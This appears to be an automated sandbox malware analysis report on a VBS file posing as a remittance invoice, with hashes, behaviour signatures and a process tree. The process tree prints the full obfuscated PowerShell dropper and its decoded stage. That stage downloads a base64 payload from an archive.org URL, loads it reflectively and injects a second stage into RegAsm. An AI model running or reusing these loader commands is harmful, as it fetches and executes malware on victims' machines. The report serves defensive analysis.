Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
12-09-2024 10:04
General
-
Target
REMIT120924001INV.vbs
-
Size
235KB
-
MD5
98558b2ec2e09d0a52805237acac44a1
-
SHA1
2256fc67c1b5bb8d9ef9c409d28ce9f3bd8afcfa
-
SHA256
dd3734aa5d87840394392fa9969dde8187f2ae2c27ff1b897c0929f012e079c8
-
SHA512
4c23f8ae54375aacef98360f0a0a763aa232014a7732857f917109d62e1295aee351ffd6c6a6069acb0d5fc2bdd92c83faa320d5201bfe26186290d304f4ad89
-
SSDEEP
6144:FlHwv///MsXttab5C/jPe3CIFn42RilWv:FlHG///1Xtkb5CbPe3CKNklc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\REMIT120924001INV.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⍊ ∥ ⤔ ⽴ ㎤B1⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤b⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤D0⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤Gg⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤B0⍊ ∥ ⤔ ⽴ ㎤H⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤cw⍊ ∥ ⤔ ⽴ ㎤6⍊ ∥ ⤔ ⽴ ㎤C8⍊ ∥ ⤔ ⽴ ㎤LwBp⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤Ng⍊ ∥ ⤔ ⽴ ㎤w⍊ ∥ ⤔ ⽴ ㎤D⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤MQ⍊ ∥ ⤔ ⽴ ㎤w⍊ ∥ ⤔ ⽴ ㎤D⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤LgB1⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤LgBh⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤YwBo⍊ ∥ ⤔ ⽴ ㎤Gk⍊ ∥ ⤔ ⽴ ㎤dgBl⍊ ∥ ⤔ ⽴ ㎤C4⍊ ∥ ⤔ ⽴ ㎤bwBy⍊ ∥ ⤔ ⽴ ㎤Gc⍊ ∥ ⤔ ⽴ ㎤Lw⍊ ∥ ⤔ ⽴ ㎤y⍊ ∥ ⤔ ⽴ ㎤DQ⍊ ∥ ⤔ ⽴ ㎤LwBp⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤ZQBt⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤LwBk⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bh⍊ ∥ ⤔ ⽴ ㎤Gg⍊ ∥ ⤔ ⽴ ㎤LQBu⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤C0⍊ ∥ ⤔ ⽴ ㎤dg⍊ ∥ ⤔ ⽴ ㎤v⍊ ∥ ⤔ ⽴ ㎤EQ⍊ ∥ ⤔ ⽴ ㎤ZQB0⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤a⍊ ∥ ⤔ ⽴ ㎤BO⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤FY⍊ ∥ ⤔ ⽴ ㎤LgB0⍊ ∥ ⤔ ⽴ ㎤Hg⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤Ds⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤Bi⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤cwBl⍊ ∥ ⤔ ⽴ ㎤DY⍊ ∥ ⤔ ⽴ ㎤N⍊ ∥ ⤔ ⽴ ㎤BD⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤PQ⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Cg⍊ ∥ ⤔ ⽴ ㎤TgBl⍊ ∥ ⤔ ⽴ ㎤Hc⍊ ∥ ⤔ ⽴ ㎤LQBP⍊ ∥ ⤔ ⽴ ㎤GI⍊ ∥ ⤔ ⽴ ㎤agBl⍊ ∥ ⤔ ⽴ ㎤GM⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤FM⍊ ∥ ⤔ ⽴ ㎤eQBz⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤ZQBt⍊ ∥ ⤔ ⽴ ㎤C4⍊ ∥ ⤔ ⽴ ㎤TgBl⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤LgBX⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤YgBD⍊ ∥ ⤔ ⽴ ㎤Gw⍊ ∥ ⤔ ⽴ ㎤aQBl⍊ ∥ ⤔ ⽴ ㎤G4⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤p⍊ ∥ ⤔ ⽴ ㎤C4⍊ ∥ ⤔ ⽴ ㎤R⍊ ∥ ⤔ ⽴ ㎤Bv⍊ ∥ ⤔ ⽴ ㎤Hc⍊ ∥ ⤔ ⽴ ㎤bgBs⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤YQBk⍊ ∥ ⤔ ⽴ ㎤FM⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤By⍊ ∥ ⤔ ⽴ ㎤Gk⍊ ∥ ⤔ ⽴ ㎤bgBn⍊ ∥ ⤔ ⽴ ㎤Cg⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤B1⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤b⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤p⍊ ∥ ⤔ ⽴ ㎤Ds⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤Bi⍊ ∥ ⤔ ⽴ ㎤Gk⍊ ∥ ⤔ ⽴ ㎤bgBh⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤eQBD⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤PQ⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Fs⍊ ∥ ⤔ ⽴ ㎤UwB5⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤G0⍊ ∥ ⤔ ⽴ ㎤LgBD⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bgB2⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤cgB0⍊ ∥ ⤔ ⽴ ㎤F0⍊ ∥ ⤔ ⽴ ㎤Og⍊ ∥ ⤔ ⽴ ㎤6⍊ ∥ ⤔ ⽴ ㎤EY⍊ ∥ ⤔ ⽴ ㎤cgBv⍊ ∥ ⤔ ⽴ ㎤G0⍊ ∥ ⤔ ⽴ ㎤QgBh⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤ZQ⍊ ∥ ⤔ ⽴ ㎤2⍊ ∥ ⤔ ⽴ ㎤DQ⍊ ∥ ⤔ ⽴ ㎤UwB0⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤aQBu⍊ ∥ ⤔ ⽴ ㎤Gc⍊ ∥ ⤔ ⽴ ㎤K⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤k⍊ ∥ ⤔ ⽴ ㎤GI⍊ ∥ ⤔ ⽴ ㎤YQBz⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤Ng⍊ ∥ ⤔ ⽴ ㎤0⍊ ∥ ⤔ ⽴ ㎤EM⍊ ∥ ⤔ ⽴ ㎤bwBu⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤ZQBu⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤KQ⍊ ∥ ⤔ ⽴ ㎤7⍊ ∥ ⤔ ⽴ ㎤CQ⍊ ∥ ⤔ ⽴ ㎤YQBz⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤ZQBt⍊ ∥ ⤔ ⽴ ㎤GI⍊ ∥ ⤔ ⽴ ㎤b⍊ ∥ ⤔ ⽴ ㎤B5⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤PQ⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Fs⍊ ∥ ⤔ ⽴ ㎤UgBl⍊ ∥ ⤔ ⽴ ㎤GY⍊ ∥ ⤔ ⽴ ㎤b⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤GM⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bp⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bg⍊ ∥ ⤔ ⽴ ㎤u⍊ ∥ ⤔ ⽴ ㎤EE⍊ ∥ ⤔ ⽴ ㎤cwBz⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤bQBi⍊ ∥ ⤔ ⽴ ㎤Gw⍊ ∥ ⤔ ⽴ ㎤eQBd⍊ ∥ ⤔ ⽴ ㎤Do⍊ ∥ ⤔ ⽴ ㎤OgBM⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤YQBk⍊ ∥ ⤔ ⽴ ㎤Cg⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤Bi⍊ ∥ ⤔ ⽴ ㎤Gk⍊ ∥ ⤔ ⽴ ㎤bgBh⍊ ∥ ⤔ ⽴ ㎤HI⍊ ∥ ⤔ ⽴ ㎤eQBD⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤bgB0⍊ ∥ ⤔ ⽴ ㎤Ck⍊ ∥ ⤔ ⽴ ㎤Ow⍊ ∥ ⤔ ⽴ ㎤k⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤eQBw⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤9⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤Bh⍊ ∥ ⤔ ⽴ ㎤HM⍊ ∥ ⤔ ⽴ ㎤cwBl⍊ ∥ ⤔ ⽴ ㎤G0⍊ ∥ ⤔ ⽴ ㎤YgBs⍊ ∥ ⤔ ⽴ ㎤Hk⍊ ∥ ⤔ ⽴ ㎤LgBH⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤BU⍊ ∥ ⤔ ⽴ ㎤Hk⍊ ∥ ⤔ ⽴ ㎤c⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤Cg⍊ ∥ ⤔ ⽴ ㎤JwBS⍊ ∥ ⤔ ⽴ ㎤HU⍊ ∥ ⤔ ⽴ ㎤bgBQ⍊ ∥ ⤔ ⽴ ㎤EU⍊ ∥ ⤔ ⽴ ㎤LgBI⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤bQBl⍊ ∥ ⤔ ⽴ ㎤Cc⍊ ∥ ⤔ ⽴ ㎤KQ⍊ ∥ ⤔ ⽴ ㎤7⍊ ∥ ⤔ ⽴ ㎤CQ⍊ ∥ ⤔ ⽴ ㎤bQBl⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤a⍊ ∥ ⤔ ⽴ ㎤Bv⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤9⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤J⍊ ∥ ⤔ ⽴ ㎤B0⍊ ∥ ⤔ ⽴ ㎤Hk⍊ ∥ ⤔ ⽴ ㎤c⍊ ∥ ⤔ ⽴ ㎤Bl⍊ ∥ ⤔ ⽴ ㎤C4⍊ ∥ ⤔ ⽴ ㎤RwBl⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤TQBl⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤a⍊ ∥ ⤔ ⽴ ㎤Bv⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤K⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤FY⍊ ∥ ⤔ ⽴ ㎤QQBJ⍊ ∥ ⤔ ⽴ ㎤Cc⍊ ∥ ⤔ ⽴ ㎤KQ⍊ ∥ ⤔ ⽴ ㎤7⍊ ∥ ⤔ ⽴ ㎤CQ⍊ ∥ ⤔ ⽴ ㎤bQBl⍊ ∥ ⤔ ⽴ ㎤HQ⍊ ∥ ⤔ ⽴ ㎤a⍊ ∥ ⤔ ⽴ ㎤Bv⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤LgBJ⍊ ∥ ⤔ ⽴ ㎤G4⍊ ∥ ⤔ ⽴ ㎤dgBv⍊ ∥ ⤔ ⽴ ㎤Gs⍊ ∥ ⤔ ⽴ ㎤ZQ⍊ ∥ ⤔ ⽴ ㎤o⍊ ∥ ⤔ ⽴ ㎤CQ⍊ ∥ ⤔ ⽴ ㎤bgB1⍊ ∥ ⤔ ⽴ ㎤Gw⍊ ∥ ⤔ ⽴ ㎤b⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤s⍊ ∥ ⤔ ⽴ ㎤C⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤WwBv⍊ ∥ ⤔ ⽴ ㎤GI⍊ ∥ ⤔ ⽴ ㎤agBl⍊ ∥ ⤔ ⽴ ㎤GM⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bb⍊ ∥ ⤔ ⽴ ㎤F0⍊ ∥ ⤔ ⽴ ㎤XQB⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤Cg⍊ ∥ ⤔ ⽴ ㎤JwB0⍊ ∥ ⤔ ⽴ ㎤Hg⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤u⍊ ∥ ⤔ ⽴ ㎤GM⍊ ∥ ⤔ ⽴ ㎤YwBv⍊ ∥ ⤔ ⽴ ㎤GU⍊ ∥ ⤔ ⽴ ㎤bg⍊ ∥ ⤔ ⽴ ㎤v⍊ ∥ ⤔ ⽴ ㎤DU⍊ ∥ ⤔ ⽴ ㎤Ng⍊ ∥ ⤔ ⽴ ㎤2⍊ ∥ ⤔ ⽴ ㎤C8⍊ ∥ ⤔ ⽴ ㎤Ng⍊ ∥ ⤔ ⽴ ㎤1⍊ ∥ ⤔ ⽴ ㎤DE⍊ ∥ ⤔ ⽴ ㎤Lg⍊ ∥ ⤔ ⽴ ㎤z⍊ ∥ ⤔ ⽴ ㎤DM⍊ ∥ ⤔ ⽴ ㎤MQ⍊ ∥ ⤔ ⽴ ㎤u⍊ ∥ ⤔ ⽴ ㎤DM⍊ ∥ ⤔ ⽴ ㎤Mg⍊ ∥ ⤔ ⽴ ㎤u⍊ ∥ ⤔ ⽴ ㎤Dg⍊ ∥ ⤔ ⽴ ㎤OQ⍊ ∥ ⤔ ⽴ ㎤x⍊ ∥ ⤔ ⽴ ㎤C8⍊ ∥ ⤔ ⽴ ㎤Lw⍊ ∥ ⤔ ⽴ ㎤6⍊ ∥ ⤔ ⽴ ㎤H⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤B0⍊ ∥ ⤔ ⽴ ㎤Gg⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Cw⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤ZQBz⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bp⍊ ∥ ⤔ ⽴ ㎤HY⍊ ∥ ⤔ ⽴ ㎤YQBk⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Cw⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤ZQBz⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bp⍊ ∥ ⤔ ⽴ ㎤HY⍊ ∥ ⤔ ⽴ ㎤YQBk⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤g⍊ ∥ ⤔ ⽴ ㎤Cw⍊ ∥ ⤔ ⽴ ㎤I⍊ ∥ ⤔ ⽴ ㎤⍊ ∥ ⤔ ⽴ ㎤n⍊ ∥ ⤔ ⽴ ㎤GQ⍊ ∥ ⤔ ⽴ ㎤ZQBz⍊ ∥ ⤔ ⽴ ㎤GE⍊ ∥ ⤔ ⽴ ㎤d⍊ ∥ ⤔ ⽴ ㎤Bp⍊ ∥ ⤔ ⽴ ㎤HY⍊ ∥ ⤔ ⽴ ㎤YQBk⍊ ∥ ⤔ ⽴ ㎤G8⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤s⍊ ∥ ⤔ ⽴ ㎤Cc⍊ ∥ ⤔ ⽴ ㎤UgBl⍊ ∥ ⤔ ⽴ ㎤Gc⍊ ∥ ⤔ ⽴ ㎤QQBz⍊ ∥ ⤔ ⽴ ㎤G0⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤s⍊ ∥ ⤔ ⽴ ㎤Cc⍊ ∥ ⤔ ⽴ ㎤Jw⍊ ∥ ⤔ ⽴ ㎤p⍊ ∥ ⤔ ⽴ ㎤Ck⍊ ∥ ⤔ ⽴ ㎤';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⍊ ∥ ⤔ ⽴ ㎤','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.ccoen/566/651.331.32.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5a59ad1b5af23d92af70871e20dd22aa5
SHA1e07762d8bd1b1fa4584b17ad6f1ca63b8c06c432
SHA2561fec0d1ac5a0baa507860e4e4f4036a081ba66134ef17ba771c575e04533e16c
SHA512d609d69bab0b7867cb7e9e0bef268bb53e19d7194888c9fc534c13f5aaa3f232cc49497995337753cfe1d7eca57d2d430dc76aa5db05453bd53442a24156c29e
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB